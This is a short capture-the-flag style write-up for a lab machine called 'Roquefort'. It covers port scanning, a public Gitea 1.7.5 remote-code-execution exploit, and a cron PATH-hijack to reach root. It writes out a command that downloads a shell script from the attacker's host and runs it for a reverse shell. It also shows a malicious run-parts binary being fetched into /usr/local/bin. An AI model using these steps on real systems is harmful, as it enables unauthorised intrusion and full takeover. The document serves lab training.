Roquefort
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.157.67
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 10:40 +08
Nmap scan report for 192.168.157.67
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
2222/tcp open EtherNetIP-1
3000/tcp open pppFTP does not allow for anonymous logins.
Web Enum -> Gitea RCE
Only port 3000 has a webpage:
In the bottom left, we can see the version, which is vulnerable to RCE:
$ searchsploit gitea 1.7.5
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Gitea 1.7.5 - Remote Code Execution | multiple/webapps/49383.py
----------------------------------------------------------- ---------------------------------We can create any account, and then use these settings:
USERNAME = "test123"
PASSWORD = "test123"
HOST_ADDR = '192.168.45.196'
HOST_PORT = 3000
URL = 'http://192.168.157.67:3000'
CMD = 'wget http://192.168.45.196:21/shell.sh && bash shell.sh'We would then get a reverse shell:
Privilege Escalation
Cronjob Path -> Root
linpeas.sh picked up that we can write to the Systemd PATH:
This means we just need to find some process from root that doesn't use the full PATH. I used pspy64 to find such a process.
2023/07/15 22:55:01 CMD: UID=0 PID=13493 | run-parts --report /etc/cron.hourly run-parts should work.
chloe@roquefort:/tmp$ which run-parts
/bin/run-partsSince the /bin directory is the last in PATH, we can place our malicious binary within /usr/local/bin to be executed first.
cd /usr/local/bin
wget 192.168.45.196:21/run-parts
chmod 777 run-partsThen, start a listener port and wait for root to execute the binary:
Last updated